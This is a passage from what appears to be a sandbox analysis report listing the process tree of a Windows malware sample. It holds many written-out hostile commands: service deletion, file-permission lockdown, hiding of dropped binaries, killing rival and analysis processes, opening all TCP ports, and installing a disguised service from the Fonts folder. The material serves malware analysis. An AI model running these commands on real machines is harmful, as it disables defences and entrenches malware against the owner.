- Suspicious use of WriteProcessMemory
PID:4288

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
2⤵
- Suspicious use of WriteProcessMemory
PID:4232

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
3⤵
PID:2700

C:\Windows\SysWOW64\net.exe
net stop lanmanserver /y
2⤵
PID:4244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop lanmanserver /y
3⤵
PID:4796

C:\Windows\SysWOW64\sc.exe
sc config lanmanserver start= DISABLED 2>nul
2⤵
- Launches sc.exe
PID:4168

C:\Windows\SysWOW64\sc.exe
sc delete lanmanserver
2⤵
- Launches sc.exe
PID:4504

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.0
2⤵
PID:4524

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.0
2⤵
PID:4860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.0
3⤵
PID:2608

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.1
2⤵
PID:2156

C:\Windows\SysWOW64\net.exe
net stop ServiceSaims
2⤵
PID:1492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ServiceSaims
3⤵
PID:3728

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.1
2⤵
PID:1512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.1
3⤵
PID:5028

C:\Windows\SysWOW64\net.exe
net stop ServiceSais
2⤵
PID:2476

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ServiceSais
3⤵
PID:1984

C:\Windows\SysWOW64\sc.exe
sc delete ServiceSais
2⤵
- Launches sc.exe
PID:5064

C:\Windows\SysWOW64\sc.exe
sc delete ServiceSaims
2⤵
- Launches sc.exe
PID:4680

C:\Windows\SysWOW64\net.exe
net stop HostManger
2⤵
PID:4764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop HostManger
3⤵
PID:4828

C:\Windows\SysWOW64\sc.exe
sc delete HostManger
2⤵
- Launches sc.exe
PID:4512

C:\Windows\SysWOW64\net.exe
net stop Hostserver
2⤵
PID:3024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Hostserver
3⤵
PID:4000

C:\Windows\SysWOW64\sc.exe
sc delete Hostserver
2⤵
- Launches sc.exe
PID:4656

C:\Windows\SysWOW64\net.exe
net stop ServiceMaims
2⤵
PID:4236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ServiceMaims
3⤵
PID:2240

C:\Windows\SysWOW64\sc.exe
sc delete ServiceMaims
2⤵
PID:3636

C:\Windows\SysWOW64\net.exe
net stop ServicesMain
2⤵
PID:1812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ServicesMain
3⤵
PID:828

C:\Windows\SysWOW64\sc.exe
sc delete ServicesMain
2⤵
- Launches sc.exe
PID:3476

C:\Windows\SysWOW64\net.exe
net stop Famserver
2⤵
PID:1916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Famserver
3⤵
PID:396

C:\Windows\SysWOW64\sc.exe
sc delete Famserver
2⤵
- Launches sc.exe
PID:3776

C:\Windows\SysWOW64\sc.exe
sc delete RpcEptManger
2⤵
PID:3852

C:\Windows\SysWOW64\sc.exe
sc delete samserver
2⤵
- Launches sc.exe
PID:2832

C:\Windows\SysWOW64\net.exe
net stop samserver
2⤵
PID:920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop samserver
3⤵
PID:1976

C:\Windows\SysWOW64\net.exe
net stop WinNsaSrv
2⤵
PID:3836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WinNsaSrv
3⤵
PID:1176

C:\Windows\SysWOW64\sc.exe
sc delete WinNsaSrv
2⤵
- Launches sc.exe
PID:1924

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set HostManger DisplayName HOST Endpoint Manger
2⤵
- Executes dropped EXE
PID:1732

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start HostManger
2⤵
- Executes dropped EXE
PID:2088

C:\Windows\SysWOW64\cmd.exe
cmd /c c:\windows\hosts1.bat
2⤵
PID:3160

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\SysWOW64\csrss.exe /p everyone:n /d system
3⤵
PID:1132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4852

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\SysWOW64\rscheck.exe /p everyone:n /d system
3⤵
PID:2784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2120

C:\Windows\SysWOW64\cacls.exe
cacls c:\windows\SysWOW64\checkrs.exe /p everyone:n /d system
3⤵
PID:4640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1592

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\seser.exe /p everyone:n /d system
3⤵
PID:4900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1800

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\seser.exe /p everyone:n /d system
3⤵
PID:804

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='seser.exe' and ExecutablePath='C:\\Windows\\system32\\seser.exe'" call Terminate
3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:3144

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='seser.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\seser.exe'" call Terminate
3⤵
- Kills process with WMI
PID:3540

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='rscheck.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\rscheck.exe'" call Terminate
3⤵
- Kills process with WMI
PID:1492

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='checkrs.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\checkrs.exe'" call Terminate
3⤵
- Kills process with WMI
PID:4608

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\vmicvess\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2476

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\ProgramData\vmicvess\svchost.exe
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3652

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData\vmicvess\svchost.exe /p everyone:n /d system
3⤵
PID:2008

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\vmicvess\\csrss.exe'" call Terminate
3⤵
- Kills process with WMI
PID:4184

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\ProgramData\Microsoft\vmicvess\csrss.exe
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2752

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData\Microsoft\vmicvess\csrss.exe /p everyone:n /d system
3⤵
PID:4724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4656

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\help\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:1652

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='SPOOLSV.exe' and ExecutablePath='C:\\windows\\help\\SPOOLSV.exe'" call Terminate
3⤵
- Kills process with WMI
PID:4544

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='services.exe' and ExecutablePath='C:\\windows\\fonts\\help\\services.exe'" call Terminate
3⤵
- Kills process with WMI
PID:1596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2656

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\fonts\help\services.exe /p everyone:n /d system
3⤵
PID:4972

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\fonts\\help\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:64

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\fonts\help\svchost.exe /p everyone:n /d system
3⤵
PID:5020

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='conhost.exe' and ExecutablePath='C:\\windows\\temp\\conhost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:3992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5032

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\temp\conhost.exe /p everyone:n /d system
3⤵
PID:3248

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:4940

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='lsmose.exe' and ExecutablePath='C:\\Windows\\debug\\lsmose.exe'" call Terminate
3⤵
- Kills process with WMI
PID:4764

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\debug\lsmose.exe
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4916

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\debug\lsmose.exe /p everyone:n /d system
3⤵
PID:4532

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='spoolsv.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\spoolsv.exe'" call Terminate
3⤵
- Kills process with WMI
PID:4252

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='update.exe' and ExecutablePath='C:\\windows\\update.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2300

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='SRDSL.exe' and ExecutablePath='C:\\windows\\syswow64\\SRDSL.exe'" call Terminate
3⤵
- Kills process with WMI
PID:4952

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='ClipBooks.exe' and ExecutablePath='C:\\windows\\syswow64\\ClipBooks.exe'" call Terminate
3⤵
- Kills process with WMI
PID:4228

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='services.exe' and ExecutablePath='C:\\windows\\debug\\services.exe'" call Terminate
3⤵
- Kills process with WMI
PID:1812

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\windows\debug\services.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:4084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1280

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\debug\services.exe /p everyone:n /d system
3⤵
PID:4000

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\debug\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:4656

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\windows\debug\svchost.exe
3⤵
- Sets file to hidden
PID:3968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2088

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\debug\svchost.exe /p everyone:n /d system
3⤵
PID:4196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4288

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData\Microsoft\vmicvess\csrss.exe /p everyone:n /d system
3⤵
PID:1652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1380

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\syswow64\ClipBooks.exe /p everyone:n /d system
3⤵
PID:1340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1508

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\syswow64\SRDSL.exe /p everyone:n /d system
3⤵
PID:1300

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='taskhost.exe' and ExecutablePath='C:\\WINDOWS\\Fonts\\taskhost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:4960

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='services.exe' and ExecutablePath='C:\\WINDOWS\\Fonts\\services.exe'" call Terminate
3⤵
- Kills process with WMI
PID:3636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2220

C:\Windows\SysWOW64\cacls.exe
cacls C:\WINDOWS\Fonts\taskhost.exe /p everyone:n /d system
3⤵
PID:2608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4668

C:\Windows\SysWOW64\cacls.exe
cacls C:\WINDOWS\Fonts\services.exe /p everyone:n /d system
3⤵
PID:3732

C:\Windows\SysWOW64\cmd.exe
cmd /c c:\windows\hosts.bat
2⤵
PID:4064

C:\Windows\SysWOW64\sc.exe
sc stop COMSysCts
3⤵
- Launches sc.exe
PID:4524

C:\Windows\SysWOW64\sc.exe
sc delete COMSysCts
3⤵
- Launches sc.exe
PID:1484

C:\Windows\SysWOW64\sc.exe
sc stop WmSrv
3⤵
- Launches sc.exe
PID:1184

C:\Windows\SysWOW64\sc.exe
sc delete WmSrv
3⤵
- Launches sc.exe
PID:3604

C:\Windows\SysWOW64\sc.exe
sc stop WmiAppSrv
3⤵
- Launches sc.exe
PID:4172

C:\Windows\SysWOW64\sc.exe
sc delete WmiAppSrv
3⤵
PID:872

C:\Windows\SysWOW64\sc.exe
sc stop "RegCsv COMSysApp"
3⤵
- Launches sc.exe
PID:2260

C:\Windows\SysWOW64\sc.exe
sc delete "RegCsv COMSysApp"
3⤵
- Launches sc.exe
PID:4492

C:\Windows\SysWOW64\sc.exe
sc stop hasplms
3⤵
- Launches sc.exe
PID:3828

C:\Windows\SysWOW64\sc.exe
sc delete hasplms
3⤵
- Launches sc.exe
PID:4716

C:\Windows\SysWOW64\sc.exe
sc stop hasp1ms
3⤵
- Launches sc.exe
PID:3520

C:\Windows\SysWOW64\sc.exe
sc delete hasp1ms
3⤵
- Launches sc.exe
PID:2412

C:\Windows\SysWOW64\sc.exe
sc stop serviceing
3⤵
- Launches sc.exe
PID:2180

C:\Windows\SysWOW64\sc.exe
sc delete serviceing
3⤵
- Launches sc.exe
PID:2428

C:\Windows\SysWOW64\sc.exe
sc stop SQLWriter$
3⤵
- Launches sc.exe
PID:4996

C:\Windows\SysWOW64\sc.exe
sc delete SQLWriter$
3⤵
PID:1480

C:\Windows\SysWOW64\sc.exe
sc stop IPSECS
3⤵
PID:3468

C:\Windows\SysWOW64\sc.exe
sc delete IPSECS
3⤵
- Launches sc.exe
PID:3880

C:\Windows\SysWOW64\sc.exe
sc stop MicrosoftFonts
3⤵
- Launches sc.exe
PID:3852

C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftFonts
3⤵
- Launches sc.exe
PID:4084

C:\Windows\SysWOW64\sc.exe
sc stop Microsoft_Update
3⤵
- Launches sc.exe
PID:3684

C:\Windows\SysWOW64\sc.exe
sc delete Microsoft_Update
3⤵
- Launches sc.exe
PID:744

C:\Windows\SysWOW64\sc.exe
sc stop "Help Service"
3⤵
PID:1280

C:\Windows\SysWOW64\sc.exe
sc delete "Help Service"
3⤵
- Launches sc.exe
PID:2832

C:\Windows\SysWOW64\sc.exe
sc stop vmicvess
3⤵
- Launches sc.exe
PID:1924

C:\Windows\SysWOW64\sc.exe
sc delete vmicvess
3⤵
- Launches sc.exe
PID:2112

C:\Windows\SysWOW64\sc.exe
sc stop SSDPSRVS
3⤵
PID:3920

C:\Windows\SysWOW64\sc.exe
sc delete SSDPSRVS
3⤵
- Launches sc.exe
PID:4060

C:\Windows\SysWOW64\sc.exe
sc stop superproservert
3⤵
- Launches sc.exe
PID:1980

C:\Windows\SysWOW64\sc.exe
sc delete superproservert
3⤵
- Launches sc.exe
PID:1004

C:\Windows\SysWOW64\sc.exe
sc stop Bcdefg
3⤵
PID:4684

C:\Windows\SysWOW64\sc.exe
sc delete Bcdefg
3⤵
- Launches sc.exe
PID:4216

C:\Windows\SysWOW64\sc.exe
sc stop ctfnom
3⤵
PID:2188

C:\Windows\SysWOW64\sc.exe
sc delete ctfnom
3⤵
- Launches sc.exe
PID:3804

C:\Windows\SysWOW64\sc.exe
sc stop ClipBooks
3⤵
PID:2044

C:\Windows\SysWOW64\net.exe
net stop "MicrosoftFonts"
3⤵
PID:4912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "MicrosoftFonts"
4⤵
PID:4680

C:\Windows\SysWOW64\net.exe
net stop MicrosoftFonts
3⤵
PID:1344

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MicrosoftFonts
4⤵
PID:2560

C:\Windows\SysWOW64\net.exe
net stop "Framework"
3⤵
PID:1452

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Framework"
4⤵
PID:5108

C:\Windows\SysWOW64\net.exe
net stop Servicing
3⤵
PID:4624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Servicing
4⤵
PID:4952

C:\Windows\SysWOW64\sc.exe
sc stop cefragsvc
3⤵
- Launches sc.exe
PID:3480

C:\Windows\SysWOW64\sc.exe
sc delete cefragsvc
3⤵
- Launches sc.exe
PID:4656

C:\Windows\SysWOW64\sc.exe
sc stop Microsoft.NET_Framework_NGEN
3⤵
- Launches sc.exe
PID:2524

C:\Windows\SysWOW64\sc.exe
sc delete Microsoft.NET_Framework_NGEN
3⤵
- Launches sc.exe
PID:2984

C:\Windows\SysWOW64\sc.exe
sc stop natiodnal
3⤵
- Launches sc.exe
PID:4484

C:\Windows\SysWOW64\sc.exe
sc delete natiodnal
3⤵
- Launches sc.exe
PID:4836

C:\Windows\SysWOW64\sc.exe
sc stop wbzxqk
3⤵
PID:2548

C:\Windows\SysWOW64\sc.exe
sc delete wbzxqk
3⤵
- Launches sc.exe
PID:3132

C:\Windows\SysWOW64\sc.exe
sc stop hidserv
3⤵
PID:2140

C:\Windows\SysWOW64\sc.exe
sc delete hidserv
3⤵
PID:4076

C:\Windows\SysWOW64\sc.exe
sc stop NetASDlogon
3⤵
- Launches sc.exe
PID:4396

C:\Windows\SysWOW64\sc.exe
sc delete NetASDlogon
3⤵
PID:1436

C:\Windows\SysWOW64\sc.exe
sc stop "BITS lsm"
3⤵
- Launches sc.exe
PID:5024

C:\Windows\SysWOW64\sc.exe
sc delete "BITS lsm"
3⤵
PID:1944

C:\Windows\SysWOW64\sc.exe
sc stop endpointrpc
3⤵
- Launches sc.exe
PID:3940

C:\Windows\SysWOW64\sc.exe
sc delete endpointrpc
3⤵
- Launches sc.exe
PID:4892

C:\Windows\SysWOW64\sc.exe
sc stop "MYSQL Input Service Name"
3⤵
- Launches sc.exe
PID:3436

C:\Windows\SysWOW64\sc.exe
sc stop csrss
3⤵
- Launches sc.exe
PID:2708

C:\Windows\SysWOW64\sc.exe
sc delete "MYSQL Input Service Name"
3⤵
- Launches sc.exe
PID:2544

C:\Windows\SysWOW64\sc.exe
sc delete csrss
3⤵
- Launches sc.exe
PID:3464

C:\Windows\SysWOW64\sc.exe
sc stop gupdate
3⤵
- Launches sc.exe
PID:1096

C:\Windows\SysWOW64\sc.exe
sc delete gupdate
3⤵
- Launches sc.exe
PID:3404

C:\Windows\SysWOW64\sc.exe
sc stop gupdatem
3⤵
- Launches sc.exe
PID:5108

C:\Windows\SysWOW64\sc.exe
sc delete gupdatem
3⤵
- Launches sc.exe
PID:344

C:\Windows\SysWOW64\sc.exe
sc stop wmiApSrvs
3⤵
PID:2300

C:\Windows\SysWOW64\sc.exe
sc delete wmiApSrvs
3⤵
PID:4172

C:\Windows\SysWOW64\sc.exe
sc stop snmpstorsrv
3⤵
PID:4952

C:\Windows\SysWOW64\sc.exe
sc delete snmpstorsrv
3⤵
- Launches sc.exe
PID:4624

C:\Windows\SysWOW64\sc.exe
sc delete "MicrosoftFonts"
3⤵
- Launches sc.exe
PID:4676

C:\Windows\SysWOW64\sc.exe
sc stop serviceing
3⤵
- Launches sc.exe
PID:752

C:\Windows\SysWOW64\sc.exe
sc delete Servicing
3⤵
- Launches sc.exe
PID:4800

C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftFonts
3⤵
PID:396

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im runhost.exe
3⤵
- Kills process with taskkill
PID:1728

C:\Windows\SysWOW64\sc.exe
sc delete WmiAppSrv
3⤵
- Launches sc.exe
PID:3100

C:\Windows\SysWOW64\sc.exe
sc stop WmiAppSrv
3⤵
- Launches sc.exe
PID:4140

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im rundllhost.exe
3⤵
- Kills process with taskkill
PID:4056

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im dlllhost.exe
3⤵
- Kills process with taskkill
PID:1916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2304

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData\WmiAppSrv\svchost.exe /p everyone:n /d system
3⤵
PID:2984

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSrv\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2164

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData\Microsoft\WmiAppSrv\csrss.exe /p everyone:n /d system
3⤵
PID:2732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2240

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1504

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system\lsmsm.exe /p everyone:n /d system
3⤵
PID:620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4588

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\mysql.log /p everyone:n /d system
3⤵
PID:4492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1964

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system\lsaus.exe /p everyone:n /d system
3⤵
PID:2568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4992

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\srvany.exe /p everyone:n /d system
3⤵
PID:3392

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\splwow64.exe /d everyone
3⤵
PID:1064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1828

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\svchost.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
PID:4396

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\svchost.exe /d everyone
3⤵
PID:2828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1264

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im tasksche.exe
3⤵
- Kills process with taskkill
PID:4980

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\tasksche.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:1252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5040

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\tasksche.exe /d everyone
3⤵
PID:3436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2964

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\help\csrss.exe /p everyone:n /d system
3⤵
PID:3120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4060

C:\Windows\SysWOW64\cacls.exe
cacls C:\windows\help\www.exe /p everyone:n /d system
3⤵
PID:3988

C:\Windows\SysWOW64\sc.exe
sc config MpsSvc start= auto
3⤵
- Launches sc.exe
PID:4688

C:\Windows\SysWOW64\net.exe
net start MpsSvc
3⤵
PID:4444

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start MpsSvc
4⤵
PID:2432

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
3⤵
- Modifies Windows Firewall
PID:3672

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
3⤵
- Modifies Windows Firewall
PID:3152

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
3⤵
- Modifies Windows Firewall
PID:3504

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
3⤵
- Modifies Windows Firewall
PID:3472

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=win
3⤵
PID:3544

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Allowlist
3⤵
PID:4284

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=denylist
3⤵
PID:2216

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
3⤵
PID:2096

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
3⤵
PID:4228

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
3⤵
PID:3576

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
3⤵
PID:4616

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
3⤵
PID:4288

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=Allow action=permit
3⤵
PID:4956

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
3⤵
PID:1704

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
3⤵
PID:1796

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=win assign=y
3⤵
PID:3188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ver "
3⤵
PID:4160

C:\Windows\SysWOW64\find.exe
find "5.1."
3⤵
PID:4308

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set HostManger Description HOST performance library information from Windows Management.
2⤵
- Executes dropped EXE
PID:2444

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install HostManger c:\windows\Fonts\lsass.exe
2⤵
- Executes dropped EXE
PID:1824

C:\Windows\SysWOW64\net.exe
net stop RpcEptManger
2⤵
PID:2264

C:\Windows\SysWOW64\sc.exe
sc delete FormManger
2⤵
- Launches sc.exe
PID:3116

C:\Windows\SysWOW64\net.exe
net stop FormManger
2⤵
PID:3388

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
2⤵
PID:4308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FormManger
1⤵
PID:4816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RpcEptManger
1⤵
PID:5020

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
1⤵
- Executes dropped EXE
PID:4120

\??\c:\windows\Fonts\lsass.exe
"c:\windows\Fonts\lsass.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3296

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im ProcessHacker.exe /f /T
3⤵
PID:3992

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ProcessHacker.exe /f /T
4⤵
